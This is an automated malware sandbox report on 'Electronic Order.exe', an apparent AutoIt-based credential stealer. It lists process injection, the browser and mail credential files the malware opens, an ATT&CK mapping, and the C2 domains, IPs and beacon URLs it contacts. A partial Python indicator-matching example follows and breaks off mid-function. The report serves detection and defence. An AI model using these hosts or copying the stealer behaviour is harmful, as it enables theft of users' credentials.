            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DC3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00DC3B4C
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DC4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00DC4A35
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E24EF5 mouse_event,0_2_00E24EF5
            Source: C:\Users\user\Desktop\Electronic Order.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Electronic Order.exe"Jump to behavior
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeProcess created: C:\Windows\SysWOW64\sfc.exe "C:\Windows\SysWOW64\sfc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E181F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00E181F7
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E24C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00E24C03
            Source: Electronic Order.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: BSPmWtBGjJwku.exe, 00000005.00000002.3958574510.0000000000FC1000.00000002.00000001.00040000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000005.00000000.2309025815.0000000000FC0000.00000002.00000001.00040000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000009.00000002.3958774348.0000000001271000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
            Source: Electronic Order.exe, BSPmWtBGjJwku.exe, 00000005.00000002.3958574510.0000000000FC1000.00000002.00000001.00040000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000005.00000000.2309025815.0000000000FC0000.00000002.00000001.00040000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000009.00000002.3958774348.0000000001271000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: BSPmWtBGjJwku.exe, 00000005.00000002.3958574510.0000000000FC1000.00000002.00000001.00040000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000005.00000000.2309025815.0000000000FC0000.00000002.00000001.00040000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000009.00000002.3958774348.0000000001271000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: BSPmWtBGjJwku.exe, 00000005.00000002.3958574510.0000000000FC1000.00000002.00000001.00040000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000005.00000000.2309025815.0000000000FC0000.00000002.00000001.00040000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000009.00000002.3958774348.0000000001271000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DE886B cpuid 0_2_00DE886B
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DF50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00DF50D7
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E02230 GetUserNameW,0_2_00E02230
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DF418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00DF418A
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DC4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00DC4AFE

Stealing of Sensitive Information

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.3957129608.0000000000730000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2389265465.0000000003360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3957402787.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2388904508.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3957321346.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2389687780.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3958904218.0000000003050000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\sfc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\sfc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\sfc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\sfc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\sfc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\sfc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\sfc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\sfc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\sfc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: Electronic Order.exe | Binary or memory string: WIN_81
Source: Electronic Order.exe | Binary or memory string: WIN_XP
Source: Electronic Order.exe | Binary or memory string: WIN_XPe
Source: Electronic Order.exe | Binary or memory string: WIN_VISTA
Source: Electronic Order.exe | Binary or memory string: WIN_7
Source: Electronic Order.exe | Binary or memory string: WIN_8
Source: Electronic Order.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.3957129608.0000000000730000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2389265465.0000000003360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3957402787.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2388904508.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3957321346.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2389687780.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3958904218.0000000003050000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\Electronic Order.exe | Code function: 0_2_00E36596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00E36596
Source: C:\Users\user\Desktop\Electronic Order.exe | Code function: 0_2_00E36A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00E36A5A
MITRE ATT&CK Matrix (one line per tactic; the number in front of a technique is the count shown for it in the original matrix, techniques without a number had no match):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 1 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 412 Process Injection; Startup Items; Scheduled Task/Job; At
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 1 DLL Side-Loading; 2 Valid Accounts; 2 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 412 Process Injection
Credential Access: 1 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 116 System Information Discovery; 151 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 3 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 21 Input Capture; 3 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 4 Ingress Tool Transfer; 1 Encrypted Channel; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Legend:

• Process
• Signature
• Created File
• DNS/IP Info
• Is Dropped
• Is Windows Process
• Number of created Registry Values
• Number of created Files
• Visual Basic
• Delphi
• Java
• .Net C# or VB.NET
• C, C++ or other language
• Is malicious
• Internet

Behavior Graph ID: 1471496
Sample: Electronic Order.exe
Startdate: 11/07/2024
Architecture: WINDOWS
Score: 100

Behavior graph edges (node numbers as in the original graph; "started" and "injected" are the original edge labels):
2 (start) -> 28 www.u9games.xyz
2 -> 30 www.j51a.xyz
2 -> 32 10 other IPs or domains
2 -> 42 Snort IDS alert for network traffic
2 -> 44 Malicious sample detected (through community Yara rule)
2 -> 46 Antivirus detection for URL or domain
2 -> 50 7 other signatures
2 -> 10 Electronic Order.exe 4 (started)
30 -> 48 Performs DNS queries to domains with low reputation
10 -> 62 Binary is likely a compiled AutoIt script file
10 -> 64 Writes to foreign memory regions
10 -> 66 Maps a DLL or memory area into another process
10 -> 13 svchost.exe (started)
13 -> 68 Maps a DLL or memory area into another process
13 -> 16 BSPmWtBGjJwku.exe (injected)
16 -> 40 Found direct / indirect Syscall (likely to bypass EDR)
16 -> 19 sfc.exe 13 (started)
19 -> 52 Tries to steal Mail credentials (via file / registry access)
19 -> 54 Tries to harvest and steal browser information (history, passwords, etc)
19 -> 56 Modifies the context of a thread in another process (thread injection)
19 -> 58 3 other signatures
19 -> 22 BSPmWtBGjJwku.exe (injected)
19 -> 26 firefox.exe (started)
22 -> 34 huayang.302.gn301.xyz 154.222.238.52, 49749, 49750, 49751 VPSQUANUS Seychelles
22 -> 36 www.dtalusering.com 103.42.108.46, 49721, 49722, 49723 SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU Australia
22 -> 38 6 other IPs or domains
22 -> 60 Found direct / indirect Syscall (likely to bypass EDR)

Source | Detection | Scanner | Label | Link
Electronic Order.exe | 50% | ReversingLabs | |
Electronic Order.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
http://www.ffi07s.xyz/y7ar/ | 0% | Avira URL Cloud | safe |
https://http.gn301.com:12345/?u= | 0% | Avira URL Cloud | safe |
https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe |
http://www.globaltrend.xyz | 0% | Avira URL Cloud | safe |
http://www.xn72dkd7scx.shop/emnz/?bB=oBBn57UjS7mF6OBjtXCA4K/r3FCs+xzFf261ivHj6HGHsVKs3oxX4EX17CbJWppp6g6A8fr9hGSE2paVCFK87Qltir3slpfPozUvsqGQgAfOSyHKAppI3MtD1Vl5l86WUTbGvYQ=&GX=iP9xCL | 100% | Avira URL Cloud | malware |
http://www.dospole.top/soqq/?bB=drOPoC+fcqVNsUc6VHZGLsfUz53xK80s09TfdoGgIRC+cuJysSYyQ9s+Q6Hx730bczsRaNUrXI+2DBjO7h7k16wibVueXlEfGw9FaQEmodkJNWHPkyZ3qvHXqJK/emHwRvwAPtc=&GX=iP9xCL | 0% | Avira URL Cloud | safe |
https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe |
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe |
http://www.alphacentura.com/mnr7/ | 0% | Avira URL Cloud | safe |
http://www.xn72dkd7scx.shop/emnz/ | 100% | Avira URL Cloud | malware |
http://www.dospole.top | 0% | Avira URL Cloud | safe |
https://ventraip.com.au/favicon.ico | 0% | Avira URL Cloud | safe |
http://www.dynamologistics.net/s992/ | 0% | Avira URL Cloud | safe |
https://www.xn72dkd7scx.shop/emnz/?bB=oBBn57UjS7mF6OBjtXCA4K/r3FCs | 100% | Avira URL Cloud | malware |
http://www.alphacentura.com/mnr7/?GX=iP9xCL&bB=pvT+HB9YRKI+POQx0b/M/ubgxhqpaEX2BZjJkbsJzaX5mdbcin6Kt2D9XOjpJuvlAq8EfVvHU99Z+IER5VLxuPSiXshxZ6wDjjo+Bu7fQW2AB1/UcYCTUQt5fsneQZKM7Qry97A= | 0% | Avira URL Cloud | safe |
http://www.dospole.top/soqq/ | 0% | Avira URL Cloud | safe |
http://www.dtalusering.com/la5g/ | 0% | Avira URL Cloud | safe |
http://www.ffi07s.xyz/y7ar/?GX=iP9xCL&bB=MrLs2OZQS9tqlK4Srgs+GAHAbHC9a9uyqM6nyvTx+aYY18R7NjkvoreXBqubaQ9RYarkm74io0l/Sb1qLPuR4+YifOOZ+EhKqCv3QpVMh7JIatK9VOcTaRm42vaE2swrp5p8moc= | 0% | Avira URL Cloud | safe |
https://badges.ausowned.com.au/07634 | 0% | Avira URL Cloud | safe |
https://www.u9games.xyz/5p8u/?bB=BWPzmKqqe8/bm9Y7L5 | 0% | Avira URL Cloud | safe |
http://www.dtalusering.com/la5g/?bB=1PPV6OmQtv6ujzxmde6xwEMvtAHXmjw0ET0xU8GpAjXY4BrLKK8c6E8QLqBoUjQmvUIqtY3TT4ZQ1NARuPdgux8tOuN0aZLZltNFIk/K42/BpKJFGlwhqT0DSxlttxHpFsGsCOs=&GX=iP9xCL | 0% | Avira URL Cloud | safe |
http://www.globaltrend.xyz/srh8/ | 0% | Avira URL Cloud | safe |
http://www.j51a.xyz/y0md/ | 0% | Avira URL Cloud | safe |
http://www.globaltrend.xyz/srh8/?bB=IQYINTaWkaojOw8AeeCEPfEIeYkq+BJ0MxZ2KDKAvD89Td2DcEp1Lez+9d6wDeiGuMtHeyxXV+kcq5RzRjH8Xk/GO/xLSHXoOvEtt1Rw61dZpGC5bSCzmgdK2DCxRFg+STwXV1g=&GX=iP9xCL | 0% | Avira URL Cloud | safe |
http://www.dynamologistics.net/s992/?bB=bPW5wL+6+Zn0FmJaaGSlZRyF0EkywNPIdxoHB7misPGpWoJmvT99WPeeVFPeE+QW7lFzZIe3p3wvC9c3tru/pp3mulo7axc+TzXdoadqFnX1TrnWwrCFMVfzI6hQm88OLivvE0I=&GX=iP9xCL | 0% | Avira URL Cloud | safe |
http://www.u9games.xyz/5p8u/?bB=BWPzmKqqe8/bm9Y7L5+Meub8zzKE0bi08FFPHLb+gDk5IVms6Q4x1dlGioX/f7BYVBQYq1+WtKZplIRrH9tE4pdkHQNYCcMydqGB2gqLe2sbuiq25D1rJ1mxG6bIX3u8VlvncNw=&GX=iP9xCL | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.dynamologistics.net | 35.212.86.52 | true | true | | unknown
weien.cdn.youziyuncdn.com | 134.122.138.60 | true | true | | unknown
www.dtalusering.com | 103.42.108.46 | true | true | | unknown
www.ffi07s.xyz | 188.114.97.3 | true | true | | unknown
www.globaltrend.xyz | 188.114.96.3 | true | true | | unknown
huayang.302.gn301.xyz | 154.222.238.52 | true | true | | unknown
ghs.googlehosted.com | 142.250.186.115 | true | false | | unknown
www.alphacentura.com | 188.114.97.3 | true | true | | unknown
www.dospole.top | 162.254.38.56 | true | true | | unknown
www.u9games.xyz | unknown | unknown | true | | unknown
www.xn72dkd7scx.shop | unknown | unknown | true | | unknown
www.j51a.xyz | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.dospole.top/soqq/?bB=drOPoC+fcqVNsUc6VHZGLsfUz53xK80s09TfdoGgIRC+cuJysSYyQ9s+Q6Hx730bczsRaNUrXI+2DBjO7h7k16wibVueXlEfGw9FaQEmodkJNWHPkyZ3qvHXqJK/emHwRvwAPtc=&GX=iP9xCL | true | Avira URL Cloud: safe | unknown
http://www.xn72dkd7scx.shop/emnz/ | true | Avira URL Cloud: malware | unknown
http://www.ffi07s.xyz/y7ar/ | true | Avira URL Cloud: safe | unknown
http://www.xn72dkd7scx.shop/emnz/?bB=oBBn57UjS7mF6OBjtXCA4K/r3FCs+xzFf261ivHj6HGHsVKs3oxX4EX17CbJWppp6g6A8fr9hGSE2paVCFK87Qltir3slpfPozUvsqGQgAfOSyHKAppI3MtD1Vl5l86WUTbGvYQ=&GX=iP9xCL | true | Avira URL Cloud: malware | unknown
http://www.alphacentura.com/mnr7/ | true | Avira URL Cloud: safe | unknown
http://www.dynamologistics.net/s992/ | true | Avira URL Cloud: safe | unknown
http://www.dospole.top/soqq/ | true | Avira URL Cloud: safe | unknown
http://www.dtalusering.com/la5g/ | true | Avira URL Cloud: safe | unknown
http://www.ffi07s.xyz/y7ar/?GX=iP9xCL&bB=MrLs2OZQS9tqlK4Srgs+GAHAbHC9a9uyqM6nyvTx+aYY18R7NjkvoreXBqubaQ9RYarkm74io0l/Sb1qLPuR4+YifOOZ+EhKqCv3QpVMh7JIatK9VOcTaRm42vaE2swrp5p8moc= | true | Avira URL Cloud: safe | unknown
http://www.alphacentura.com/mnr7/?GX=iP9xCL&bB=pvT+HB9YRKI+POQx0b/M/ubgxhqpaEX2BZjJkbsJzaX5mdbcin6Kt2D9XOjpJuvlAq8EfVvHU99Z+IER5VLxuPSiXshxZ6wDjjo+Bu7fQW2AB1/UcYCTUQt5fsneQZKM7Qry97A= | true | Avira URL Cloud: safe | unknown
http://www.dtalusering.com/la5g/?bB=1PPV6OmQtv6ujzxmde6xwEMvtAHXmjw0ET0xU8GpAjXY4BrLKK8c6E8QLqBoUjQmvUIqtY3TT4ZQ1NARuPdgux8tOuN0aZLZltNFIk/K42/BpKJFGlwhqT0DSxlttxHpFsGsCOs=&GX=iP9xCL | true | Avira URL Cloud: safe | unknown
http://www.dynamologistics.net/s992/?bB=bPW5wL+6+Zn0FmJaaGSlZRyF0EkywNPIdxoHB7misPGpWoJmvT99WPeeVFPeE+QW7lFzZIe3p3wvC9c3tru/pp3mulo7axc+TzXdoadqFnX1TrnWwrCFMVfzI6hQm88OLivvE0I=&GX=iP9xCL | true | Avira URL Cloud: safe | unknown
http://www.j51a.xyz/y0md/ | true | Avira URL Cloud: safe | unknown
http://www.u9games.xyz/5p8u/?bB=BWPzmKqqe8/bm9Y7L5+Meub8zzKE0bi08FFPHLb+gDk5IVms6Q4x1dlGioX/f7BYVBQYq1+WtKZplIRrH9tE4pdkHQNYCcMydqGB2gqLe2sbuiq25D1rJ1mxG6bIX3u8VlvncNw=&GX=iP9xCL | false | Avira URL Cloud: safe | unknown
http://www.globaltrend.xyz/srh8/ | true | Avira URL Cloud: safe | unknown
http://www.globaltrend.xyz/srh8/?bB=IQYINTaWkaojOw8AeeCEPfEIeYkq+BJ0MxZ2KDKAvD89Td2DcEp1Lez+9d6wDeiGuMtHeyxXV+kcq5RzRjH8Xk/GO/xLSHXoOvEtt1Rw61dZpGC5bSCzmgdK2DCxRFg+STwXV1g=&GX=iP9xCL | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | sfc.exe, 00000007.00000002.3962019636.00000000079E8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | sfc.exe, 00000007.00000002.3962019636.00000000079E8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.globaltrend.xyz | sfc.exe, 00000007.00000002.3959870442.000000000433E000.00000004.10000000.00040000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000009.00000002.3959186509.000000000388E000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | sfc.exe, 00000007.00000002.3962019636.00000000079E8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | sfc.exe, 00000007.00000002.3962019636.00000000079E8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://http.gn301.com:12345/?u= | sfc.exe, 00000007.00000002.3961770310.0000000005FA0000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000007.00000002.3959870442.0000000004662000.00000004.10000000.00040000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000009.00000002.3959186509.0000000003BB2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.dospole.top | BSPmWtBGjJwku.exe, 00000009.00000002.3960768107.0000000005182000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | sfc.exe, 00000007.00000002.3962019636.00000000079E8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ventraip.com.au/favicon.ico | sfc.exe, 00000007.00000002.3959870442.0000000003CF6000.00000004.10000000.00040000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000009.00000002.3959186509.0000000003246000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.u9games.xyz/5p8u/?bB=BWPzmKqqe8/bm9Y7L5 | sfc.exe, 00000007.00000002.3959870442.0000000003B64000.00000004.10000000.00040000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000009.00000002.3959186509.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2807696663.00000000018B4000.00000004.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | sfc.exe, 00000007.00000002.3962019636.00000000079E8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.xn72dkd7scx.shop/emnz/?bB=oBBn57UjS7mF6OBjtXCA4K/r3FCs | sfc.exe, 00000007.00000002.3959870442.000000000401A000.00000004.10000000.00040000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000009.00000002.3959186509.000000000356A000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | sfc.exe, 00000007.00000002.3962019636.00000000079E8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://badges.ausowned.com.au/07634 | sfc.exe, 00000007.00000002.3961770310.0000000005FA0000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000007.00000002.3959870442.0000000003CF6000.00000004.10000000.00040000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000009.00000002.3959186509.0000000003246000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | sfc.exe, 00000007.00000002.3962019636.00000000079E8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | ASN Country | Malicious
188.114.97.3 | www.ffi07s.xyz | European Union | 13335 | CLOUDFLARENET | US | true
154.222.238.52 | huayang.302.gn301.xyz | Seychelles | 62468 | VPSQUAN | US | true
188.114.96.3 | www.globaltrend.xyz | European Union | 13335 | CLOUDFLARENET | US | true
103.42.108.46 | www.dtalusering.com | Australia | 45638 | SYNERGYWHOLESALE-AP SYNERGY WHOLESALE PTY LTD | AU | true
134.122.138.60 | weien.cdn.youziyuncdn.com | United States | 64050 | BCPL-SG BGPNET Global ASN | SG | true
35.212.86.52 | www.dynamologistics.net | United States | 19527 | GOOGLE-2 | US | true
142.250.186.115 | ghs.googlehosted.com | United States | 15169 | GOOGLE | US | false
162.254.38.56 | www.dospole.top | United States | 13768 | COGECO-PEER1 | CA | true
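The following Python is an added example and not part of the Joe Sandbox report. It turns the IP/domain rows above into indicators, emits Suricata DNS rules for the domains, and classifies constructed DNS log lines against them. The log format, the sample log lines and the rule SIDs are assumptions; the indicators themselves are the table rows. The classifier keeps a domain hit separate from an IP-only hit because the two Cloudflare addresses (AS13335) are shared anycast front ends: the similar-samples tables further down show unrelated LummaC, Vidar, Snake Keylogger and phishing samples resolving to the same 188.114.96.3 and 188.114.97.3, so an IP match there is weak evidence on its own.

```python
"""IOC extraction and DNS log matching for the network table above.
Added example, not Joe Sandbox code. Log format and sample lines are constructed."""
import ipaddress
import re

# Rows copied from the report's IP / domain / ASN table: (ip, domain, asn, asn_name, malicious)
NETWORK_TABLE = [
    ("188.114.97.3",    "www.ffi07s.xyz",            13335, "CLOUDFLARENET",       True),
    ("154.222.238.52",  "huayang.302.gn301.xyz",     62468, "VPSQUAN",             True),
    ("188.114.96.3",    "www.globaltrend.xyz",       13335, "CLOUDFLARENET",       True),
    ("103.42.108.46",   "www.dtalusering.com",       45638, "SYNERGYWHOLESALE-AP", True),
    ("134.122.138.60",  "weien.cdn.youziyuncdn.com", 64050, "BCPL-SG",             True),
    ("35.212.86.52",    "www.dynamologistics.net",   19527, "GOOGLE-2",            True),
    ("142.250.186.115", "ghs.googlehosted.com",      15169, "GOOGLE",              False),
    ("162.254.38.56",   "www.dospole.top",           13768, "COGECO-PEER1",        True),
]

# Judgment call (assumption): addresses in these ASNs are shared CDN / hosting front ends,
# so an IP-only match is low confidence; a domain match is what you act on.
SHARED_INFRA_ASNS = {13335, 15169}


def build_iocs(table):
    """Split the table into {domain: asn} and {ip: asn}, keeping only rows flagged malicious."""
    domains, ips = {}, {}
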